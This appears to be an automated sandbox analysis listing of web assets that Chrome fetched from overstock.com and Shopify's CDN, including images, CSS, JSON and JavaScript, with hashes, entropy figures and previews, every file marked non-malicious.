                                                                                                                                                                                    Entropy (8bit):4.055311714128706
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:t1pWDQF0BjSfrcD2ae8R8ego7+g8ZHpKsGEyKSe2t+:tTWM0ofZae8megoNcKsGEyw
                                                                                                                                                                                    MD5:98C83D05C80E256B4628F4EA12E8A786
                                                                                                                                                                                    SHA1:EF0F1237EEFCAE6CEA0329C5041A9DD7AFA00252
                                                                                                                                                                                    SHA-256:8FCF4706E403364413AEE225F32E766299617D0A7E2C987E21AFC3CC0EAC889B
                                                                                                                                                                                    SHA-512:F2FA11159F86935D84DC281A0B0F32F1FC6FB87A3FE887D3958EA15579414F484C3E379EE266E2212B0A45289FCEFBDB8C29538911ACC333BB037FC435DAA419
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="179" height="66" fill="none">. <g clip-path="url(#a)">. <mask id="b" width="179" height="66" x="0" y="0" maskUnits="userSpaceOnUse" style="mask-type:luminance">. <path fill="#fff" d="M179 0H0v66h179V0Z"/>. </mask>. <g fill="#D90023" mask="url(#b)">. <path d="M142.197 61.47a9.81 9.81 0 0 1-3.862-.718 8.228 8.228 0 0 1-2.866-1.974 8.446 8.446 0 0 1-1.781-3.006 12.28 12.28 0 0 1 0-7.652 8.448 8.448 0 0 1 1.781-3.007 8.247 8.247 0 0 1 2.866-1.973 10.757 10.757 0 0 1 7.725 0 8.253 8.253 0 0 1 2.865 1.973 8.488 8.488 0 0 1 1.783 3.007 12.28 12.28 0 0 1 0 7.652 8.486 8.486 0 0 1-1.783 3.006 8.224 8.224 0 0 1-2.865 1.974 9.829 9.829 0 0 1-3.863.717Zm0-3.146a4.566 4.566 0 0 0 2.315-.56 4.806 4.806 0 0 0 1.607-1.467c.427-.622.74-1.314.927-2.045a9.17 9.17 0 0 0 0-4.63 6.174 6.174 0 0 0-.927-2.043 4.927 4.927 0 0 0-1.607-1.452 5.024 5.024 0 0 0-4.612 0 4.93 4.93 0 0 0-1.609 1.452 6.195 6.195 0 0 0-.927 2.044 9.192 9.192 0 0 0 0 4.6
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1472
                                                                                                                                                                                    Entropy (8bit):6.681436610515561
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:GTCIl/X2YlXWI2PUCXuvvmd8vuj3v6HH4NuZ7bgMkYibTiqvinjHmcG:LIl/XflQXyvwzyHHuUbg9pijG7
                                                                                                                                                                                    MD5:CB0214AC2CB99AF4CA1AF7F5AAC669C5
                                                                                                                                                                                    SHA1:BD30B741EA3B240082DBFB76B82313B41A818BB0
                                                                                                                                                                                    SHA-256:6899F7E893FFAD4484E91DCA4B5560D23CA5019180EBFE42FB6B52FEB187F750
                                                                                                                                                                                    SHA-512:B85BD148B1D92F2BDEE189855033ADFC7C6C6FAEC91784F328E31540843725D48316864778B343ABA13020FA675DF6B5EDE1649A24782A113BF8FF7C8356D043
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_c3b7c5e5-b3d7-49cc-99d0-363b5393a690.jpg?v=1729325328&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 (...P....*P.P.>1..B.!!... ....j~/..Jy..Y.>......>Pk.....q...f.\...f?.-...f..[U..3.V'..i;DU..-....E. .H.....s......Eu.\.....$...+.....x$z...@..a....@u._...h....N.......J....<..>`Cd.....OF~.."DXO..3..^..o.[...s.z:..`0>...e......sc..~....~|...|G..N..%....HL[...Q..n|pD .E....c.Z..`.>....[2.@.9.>3...=..Y8`..^.!,..M..zoD......}y2..rt..}\..x.....a{4....i.).t.A.5.9..F.v81......]..e.@......V...w}..I....EH.R....F]..5..Z_...}'...x...,.}.7k(...lm.]s..v.b'..K$.p..v ..A.I.....i..}.......4`e.2?..._"XO.......z....+..o.?2.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):45078
                                                                                                                                                                                    Entropy (8bit):4.770569902289332
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:mlF13tuF24QFBF6TF5hFLF6w9kFAFY6FDjIFQFcwFA4wWuQ+FxZ+F6wFAFRF7gFN:q/tuM4QfoTHhRbiy9u63CCuQ+DZ+9Gno
                                                                                                                                                                                    MD5:B4109405FDDFC078637A0EACAE82CFAE
                                                                                                                                                                                    SHA1:6F749292C0F4B8DA6DB2CC5FC054342E58DEB324
                                                                                                                                                                                    SHA-256:D0CB51B1445822450AF3246CA283173B4CA24FCFDDF868AAB063AC9F2309D3CD
                                                                                                                                                                                    SHA-512:8EFDE0BA77352E6B8611AB3157BE0130D3A3A522FDEAB865E06E9981993134DB68EF4361D0658E4219535CB7BB48F290C518C9D6CCB51A633DC901C69F7E60FD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/extensions/162002f6-08d7-4b02-b4ce-48655f8f0c90/kite-free-gift-discounts-409/assets/freeGiftLogicv1.css
                                                                                                                                                                                    Preview::root{. --DEFAULT-BORDER-COLOR: #9EBADC;. --DEFAULT-BG-COLOR: #4B556C;. --BLACK-COLOR: #000000;. --WHITE-COLOR: #FFFFFF;.}../* reusable css classes starts */...underline{. text-decoration: underline !important;.}..no-underline{. text-decoration: none;.}..no-underline > .underline{. text-decoration: underline !important;.}..font-weight-medium{. font-weight: 600;.}../* reusable css classes ends */.....gfgFreeGiftMsgContainer {. display: grid;. grid-template-columns: 0.2fr 1fr;. grid-template-rows: 1fr;. font-size: 14px;. box-shadow: 0 2px 4px 0px rgba(0, 0, 0, 0.2), 0 2px 10px 0 rgba(0, 0, 0, 0.19);. grid-gap: 10px;. padding: 10px 8px;. border-radius: 4px;. line-height: normal !important;.}...gfgFreeGiftMsgIcon {. width: 80px;. height: 80px;..}....gfgProductPageWrapperV2 {. margin-bottom: 5px;. line-height: normal;.}...cart__ctas {. display: grid !important;.}...gfgVolDiscountContainer{. /* display: grid;. grid-gap:
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3148)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3253
                                                                                                                                                                                    Entropy (8bit):4.968377558482353
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:agzUx0k3bl2JOTx13RWZ8Ig8ImP5qVUBSUaSUZWPP5zNirt75aRvAnxNyh8:bkL8OTLz/L88
                                                                                                                                                                                    MD5:173A372CF13CC3CA592BD97BF0326521
                                                                                                                                                                                    SHA1:6A76CDB941FCE2D5C1D7A9525D3EEBB8B9FE1C12
                                                                                                                                                                                    SHA-256:2928C4D65A846EC1E60F6421E6A5E22F6CF13A8A21476C81563EB1C96A0A17F5
                                                                                                                                                                                    SHA-512:817EC29E5352B2FE40AFF913A2F4AB777D4DF13D69870679EA37520576C31918A1DFB563D0CD012D268F3E7744A0BFB9ACC96928819AC5D6206D8AB41FAC7BA9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/component-pills.css?v=175203172855090728401730157903
                                                                                                                                                                                    Preview:.angle{display:inline-block;pointer-events:none;-webkit-user-select:none;user-select:none;width:1em;height:1em;vertical-align:middle;line-height:0}.angle-icon{width:100%;height:100%;position:relative;display:inline-block;transition:transform .25s ease}.angle-icon:before,.angle-icon:after{content:"";width:50%;height:.1em;top:50%;position:absolute;background-color:currentColor;display:inline-block;border-radius:2px}.angle-icon:before{left:.1em;transform:rotate(45deg)}.angle-icon:after{right:.1em;transform:rotate(-45deg)}.angle-up .angle-icon{transform:rotate(180deg)}.angle-left .angle-icon{transform:rotate(90deg)}.angle-right .angle-icon{transform:rotate(-90deg)}.pill-nav{display:flex;align-items:center;padding-left:1px;--color-border: 218, 220, 223;--color-box-shadow: 218,220,223;--color-background: 255, 255, 255;--color-foreground-alt: 90,90,90}.setting-buttons-outline .pill-nav{grid-column-gap:.1rem}.pill-nav-item{flex:none;display:inline-flex;justify-content:center;align-items:center
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1584
                                                                                                                                                                                    Entropy (8bit):6.790312560592531
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:KGTCIl/X2YlXWI2PUAEJtJT2XE2E9PlcSFkgzT85XMmoZ2gMrhxxgS/M:KLIl/XflKEJr2gzTeCZ2CS/M
                                                                                                                                                                                    MD5:9B35E878A6F11CD26F02769579A91EE2
                                                                                                                                                                                    SHA1:02BD71AF5C517249526DF2AF775E3DC5E6926BC0
                                                                                                                                                                                    SHA-256:4DE1F2315292B8481C3C6FA9DDFE89A253AE8C7A864F0CDB42FE4181C9B76354
                                                                                                                                                                                    SHA-512:15707AEEC7DE20DB27D8BA8AF73163E7AFE8C8841F3B894C3F90B2E07E3308B08C52FCF13372AFB7B2B6C691AE237D0DAEB18515637DADB2FC450AE39C808742
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_f811fc22-36d8-453c-8b9d-0bc174c3b10a.jpg?v=1729325169&width=80
                                                                                                                                                                                    Preview:RIFF(...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....0....*P.P.>1..B.!!..4h ....HE..wk......}....o.K....m.G....#..K^.<..N.g..~.{.....%..].""..5.|vrL....W.i.A.b#.0a4>.%I?Nch&r0....u..H..5..Q.U...&.]8S......h...=......\}.O.c5A.._udG....D...T.o!.e.a....N.r.+>..f.....H..z..N..^.`.....?....`.a...s..-.4..(J....KIy(..N>E.5......}.....4!....v.......=%.s......u..../2fyvyxQ>.@......o@..>..(.E...........K...........ph..rs..kN..}o.Fa.....D.....:E=.G....F(...:./..._k........d...!!.....>.&.*....#.A|.i.......%...]..Z...1^.z..>.:...z.p....]....r....=....ob...\n...d.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x366, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):54134
                                                                                                                                                                                    Entropy (8bit):7.955166617142353
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:SZ9Xz3sdvi9tPL5zCKaA2KtAxsLAq0kHS6MP7+RZiv:CcVUF5zCimxmXHSjP7+e
                                                                                                                                                                                    MD5:06AD079488B040E0C4ABB546918A402D
                                                                                                                                                                                    SHA1:EFC246FFFEF8D376993197BD1EDECE243543A802
                                                                                                                                                                                    SHA-256:D321AAABF38C14B746E038DF82A99B442D622DB985E64E15FED7BBF15F509AE5
                                                                                                                                                                                    SHA-512:0167237D41DC17E2213EB9260BCD3B95632AA10D66B9907C069EAC2B84FD8519898E558028D8C53E39F803D5EAE581416397E6A7D525173E86D5519E784958B1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................n...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......n.............................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2318
                                                                                                                                                                                    Entropy (8bit):7.3022551128418955
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:ZIl/XflYdE02RxmHmGLHNO7ZHEVXqNFGnHoKWt:ZIl/XAOmHvHOZHEsFGnHc
                                                                                                                                                                                    MD5:C13B4F75CE6595DA3DABA66B97B6E022
                                                                                                                                                                                    SHA1:1456562E028B95FCFA72F7BEF9ABF64097BD6D65
                                                                                                                                                                                    SHA-256:2858BA31FE34992B523AF1E57563ECF9143305F738725CC668139B5295EFB807
                                                                                                                                                                                    SHA-512:94B37340DFBA75CB58E796FD4039D0691E639EE0DB563CB36CBC8FA793505B307D1117AE3FE694845A30CC3D44BF0763D25FC5E96CB677B9AFAB2189B2889011
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_cee21092-aa90-4efc-a20a-8508ad9290e9.jpg?v=1729322886&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 v...0....*P.P.>1..C"!!.Y>. ....e.D....4.k..=...p.w............{..2}.U.7.`.:R...+......._...2').S..o/.f.G.1&...YP&_..R..Z.......j..:.r..{.QL-..:..".U.P.f.@{........dj8.z*A.S.N...9..o...........|.....i....g.........9.`7.....T.h.}..l.N.5......X.\...j....)...".Sz....GdP..|.b..w...uG.j..-.%....+....K6...ONp%W. .....}......>3..........Z....E#B..#.?.K....Z~...u#..&Y..#e..:.............w.?4../...b3.K|..L.(x.....V.oL5l..6..R..B?..)}.z..>(..L.....9.C......%D.#..%..x.wOy.$........-5.i...le.q...d.....).".fS
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):9497
                                                                                                                                                                                    Entropy (8bit):3.803329550188562
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:Ma39m2jfdpWhi7T/lyoRk+jFikczjlNjGNHckh8TlwHGNw5nzXl1PnkymQ/eETaJ:t95jfdQ87q+jIRzjlNj28QGNmrNWO1Qr
                                                                                                                                                                                    MD5:871FBAB3856A9FCC30768C3B7ED875AF
                                                                                                                                                                                    SHA1:C9A6C3FB54704A4C5EBA36C40F9200DA83F7E2D7
                                                                                                                                                                                    SHA-256:D0917DF1FF1EE7072978E78DB5489CD7A3CFABF1EF201484CB4228BBAA222BB6
                                                                                                                                                                                    SHA-512:3955022DC365602DC133BDEA941DA8578E1099C9C349B1A05D45C0BD23836D4E349C1465332AEE87D266E867F12D8863ABF0D96609815BE81923BD6C906F6A0B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Group_570.svg?v=1719045744&width=194
                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 194 40" height="40" width="194">.<path fill="white" d="M34.2235 9.53755L25.5832 14.587V24.3493L16.9435 29.6229L8.6404 24.6858V34.3358L16.9435 39.2728L34.2235 29.2863V9.53755ZM17.2801 9.64993L25.5832 14.587V4.93705L17.2801 0L0.00012207 9.98648V29.7347L8.6404 24.6858L8.63982 14.9235L17.2801 9.64993Z" clip-rule="evenodd" fill-rule="evenodd"></path>.<path fill="white" d="M47.3635 19.8779C47.3635 20.8205 47.4682 21.7421 47.6777 22.6427C47.9081 23.5225 48.2642 24.3184 48.7459 25.0305C49.2276 25.7427 49.856 26.3187 50.631 26.7585C51.406 27.1774 52.3485 27.3869 53.4586 27.3869C54.5688 27.3869 55.5113 27.1774 56.2863 26.7585C57.0613 26.3187 57.6896 25.7427 58.1714 25.0305C58.6531 24.3184 58.9987 23.5225 59.2082 22.6427C59.4386 21.7421 59.5538 20.8205 59.5538 19.8779C59.5538 18.8935 59.4386 17.9405 59.2082 17.0189C58.9987 16.0973 58.6531 15.2804 58.1714 14.5683C57.6896 13.8352 57.0613 13.2592 56.2863 12.8402C55.5113 12.4004 54.5688
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (336)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):458
                                                                                                                                                                                    Entropy (8bit):5.083093074926281
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:giPtydgJowCfMCgCfMClS4QaEoWH1ARMAsk7v:giPtyeJFLjLqsosCRZXr
                                                                                                                                                                                    MD5:642173BE054799A424915838F618D190
                                                                                                                                                                                    SHA1:C2EB119D3CDA65072343E80FC341116931E2CED3
                                                                                                                                                                                    SHA-256:2792BF612B0764521F758C6C458A332BF0F42F312C8D27EBE6F8F465FC0F3B45
                                                                                                                                                                                    SHA-512:3C63CEFCB0FF7C97A4843BB204FA4E722C3756F9BE9717B8B00D0BC58B4B82BB35BF46ED6EE1423E0CF2C477922502B352094118A2C62CDB27AB7BCEDB2FD7AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:shopify.extend('WebPixel::Render', function (api) {. var analytics=api.analytics,browser=api.browser,init=api.init;. var e=api._pixelInfo?api._pixelInfo.runtimeContext:null,n=api._pixelInfo?api._pixelInfo.type:null;analytics.subscribe("all_standard_events",(function(i){var l,o;l=i.name,o=i,browser.localStorage.getItem("shopify-pixel-mode").then((function(i){"debug"===i&&console.log(`[shopify-pixel][${n}][${e}] ${l}`,o)})).catch((function(){}))}));.});.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                    Entropy (8bit):5.2560185150305
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:YYriyauoXCe90ZdwDqsrVGdewoBVwoBBCLbiBbV9I4ebCmIA4XiYHj1w5k6BCLcr:YuiyuyW0PwDqsrVGdewSwGI/b7YJw5lr
                                                                                                                                                                                    MD5:0B5CC51FC3CE7229C16F69FEEA8A5D35
                                                                                                                                                                                    SHA1:7A335DF1014BD262C5CE567B796BE2DFFDD367E8
                                                                                                                                                                                    SHA-256:F18BC204123194F8C38FD2ABFA546DF7F344ECF1A45D7270666F431108C355EF
                                                                                                                                                                                    SHA-512:33BC08CF15B6B34D02952544FC384FCC30E5DAFB1C6211DDC24341D0682B50A50C6DA8FF0B8C8DBE613000005BF08B2B146A7E51E809055B327D20DC0ED9D639
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"token":"Z2NwLXVzLWNlbnRyYWwxOjAxSkJFU0VaUFkxODdFRlo0VFBLMlRFR0FR?key=840dbf61484c6e9439706f0c9300fee3","note":"","attributes":{},"original_total_price":0,"total_price":0,"total_discount":0,"total_weight":0.0,"item_count":0,"items":[],"requires_shipping":false,"currency":"USD","items_subtotal_price":0,"cart_level_discount_applications":[]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 640x640, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):27665
                                                                                                                                                                                    Entropy (8bit):7.737570809634224
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:zCa40rGRzR6e+2dn0rnX4rcf6EDVL3EJRp8:+a4cGtRu2d0rnXiEDVQa
                                                                                                                                                                                    MD5:FCE0234CA5C9546C69CBBF9862AC303F
                                                                                                                                                                                    SHA1:25F0DA83D460700067C80CD7CE136C232A3EB5D4
                                                                                                                                                                                    SHA-256:8E60C71BF15D23EAB40C5C353A813D08FA64D3F3F59DEBD8F50CA8BC20CA258A
                                                                                                                                                                                    SHA-512:ABE9E6AE618E9E9B5EA899D1A4EF6C0877BF22396499734C93DC5AA10F3FA1ED9431AFFB8407582358382E48FF03745F98DB331042A455A0A79328BA3D214469
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}....................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 564
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):331
                                                                                                                                                                                    Entropy (8bit):7.303388870408431
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:XtMLpr2QgWq+74OY5lNTbEIWH1YHChyr83W66DNhPSbv7P97NB/:XOtMWq+cOylNTbk1YihysW66DNZSbzPN
                                                                                                                                                                                    MD5:453337D17580029E1D3C01EF733E6338
                                                                                                                                                                                    SHA1:BBB505D93EE06D2AFBB124B63D5F41ADE88CECCD
                                                                                                                                                                                    SHA-256:6E331F5545E2973EAE34F1D076E2479A8D3681D766AEF6DE6B939B9C19B0172D
                                                                                                                                                                                    SHA-512:63115BCDE61A9BB77A443705346D69256369D071C6D503D3150899BFF0208F3533C93A6946EC8DC45DA638D4F667CC802D99CCC6A7C4E92921FCB718446863B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:..........e.Oo.0..J...4q..n...H.nk...BikhD...!.w.3V..[..._|..>..f..J /G..\.:{0P.T.tP..T...P...`L_6......C..,...BGiC..?r.B.........+..V....>.u.h.....d{..K.".J..a......E.....6(......#.re.. .z........HS.do...:...rY..3j...s... I......8.....I.H...........C1M.t.xJ...d..%c1........j.D.>.{B{a...M.{..j&.q.qEX../ko494...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                    SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                    SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                    SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://visitor-service-eu-central-1.tealiumiq.com/overstock/main/0192dd989206000e7d3829e304150506f002106700918?callback=utag.ut%5B%22writevamain%22%5D&rnd=1730294619612
                                                                                                                                                                                    Preview:{}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):122
                                                                                                                                                                                    Entropy (8bit):5.1414427194822405
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:yWSMnNfGLf4eBrfRVAEiLTQFeSmxqeT7GEJMYBBxPRpEk:yWFu48UfLckFxqM72Y3xpT
                                                                                                                                                                                    MD5:61C47F2AC2B958728F19F61FA762D968
                                                                                                                                                                                    SHA1:24DB241FC0432F9A3D15FE084168905B1FABC208
                                                                                                                                                                                    SHA-256:C917950DADA8F6EDFD4CC12CF0DDCC72C4489AB700B6D43D1C61CFA6C40255B3
                                                                                                                                                                                    SHA-512:6F87B31E28A64E83B0996C9466E5EFBEE4E8B5FFC9603E130709EF86446558C500A2D43FEE324A62EC7135A4F594D5DBED808114C005F68F6A1A0DDB356561FA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/ShopPayLogo.D_HPU8Dh.css
                                                                                                                                                                                    Preview:._8ssCG{width:59px}.zS4x6{width:68px}.PrlUn{width:84px}.SsCEp{width:100px}.aTkbO{vertical-align:middle;margin-bottom:1px}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (36511)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):36534
                                                                                                                                                                                    Entropy (8bit):5.658837419730568
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:MjEkL37lj5OIiqZEzfLLlEoczIaNCvhT35+ZENGuTNzaU6xZxpfmfgiC1Uj8NDRi:wXJVpicEzfLLlK0vhIxZxpggUyRdVO
                                                                                                                                                                                    MD5:F6106F5B5964EE6A29C11A0E41A897BA
                                                                                                                                                                                    SHA1:6383B55E025EB19E178220DF9F9A33A8599F8986
                                                                                                                                                                                    SHA-256:AFDB73B4F15B06F36163A602B03BA327DCAC2B9158B00C7177654EDBE3A1530A
                                                                                                                                                                                    SHA-512:72EAE4842ECB9B739BA4F0B2740D99FF5BC24C7C4394EFED2D5D60C5BE4E243714AB46CA962CB429BE07872AF9E68A56B947C43C34815F5B5CA95F208704C128
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/vsearch-autocomplete.CGRHStzc.js
                                                                                                                                                                                    Preview:var Ae=Object.defineProperty;var Be=(e,t,n)=>t in e?Ae(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n;var ge=(e,t,n)=>(Be(e,typeof t!="symbol"?t+"":t,n),n);import{r as u,j as s,p as Fe,c as P,H as Me,a as $e,b as De}from"./vsearch-vendor.2xH_R9Qb.js";import{s as V}from"./vsearch-facetssearchresultswrapper.Cuju1057.js";var Ue={VITE_BASE_URL:"https://api.overstock.com",VITE_SEARCH_PATHNAME:"/search",VITE_COLLECTIONS_PATHNAME:"/collections",VITE_FACETS_AND_PRODUCTS_API_URL:"/vsearch/products/v1",VITE_AUTOCOMPLETE_SUGGESTIONS:"/search/suggestions",VITE_POWER_REVIEW_API_KEY:"0ce15d13-67ca-47dd-8c72-1d5e4694ada3",VITE_POWER_REVIEW_MERCHANT_GROUP_ID:"1939031562",VITE_POWER_REVIEW_MERCHANT_ID:"1280018588",VITE_SANDBOX_BASE_URL:"https://api-integration.test.overstock.com",VITE_IS_TAXONOMY_FACETS_ENABLED:"false",BASE_URL:"/",MODE:"production",DEV:!1,PROD:!0,SSR:!1};const Ve="/search",We="/collections",Ge="/vsearch/products/v1",ze="/search/suggestions",He="0ce15d13-67ca-47dd-8c72
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):89501
                                                                                                                                                                                    Entropy (8bit):5.289893677458563
